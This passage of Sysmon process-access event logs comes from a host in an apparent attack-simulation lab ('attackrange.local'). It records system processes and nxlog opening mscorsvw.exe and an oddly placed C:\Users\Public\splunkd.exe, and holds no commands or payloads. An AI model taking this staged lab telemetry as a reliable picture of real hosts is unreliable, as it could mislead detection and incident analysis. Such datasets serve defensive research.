.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8738,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:48.482\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1398-5F25-0000-00108D661000}\r\nTargetProcessId: 4164\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:48.482","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1398-5F25-0000-00108D661000}","TargetProcessId":"4164","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8739,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:48.498\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1398-5F25-0000-00108D661000}\r\nTargetProcessId: 4164\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:48.498","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1398-5F25-0000-00108D661000}","TargetProcessId":"4164","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8740,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:48.607\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1398-5F25-0000-0010256A1000}\r\nTargetProcessId: 4836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:48.607","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1398-5F25-0000-0010256A1000}","TargetProcessId":"4836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8741,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:48.607\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1398-5F25-0000-0010256A1000}\r\nTargetProcessId: 4836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:48.607","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1398-5F25-0000-0010256A1000}","TargetProcessId":"4836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8742,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:48.623\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1398-5F25-0000-0010256A1000}\r\nTargetProcessId: 4836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:48.623","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1398-5F25-0000-0010256A1000}","TargetProcessId":"4836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8743,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:49.498\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:49.498","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8744,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:50.513\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:50.513","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8745,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:51.529\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:51.529","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files 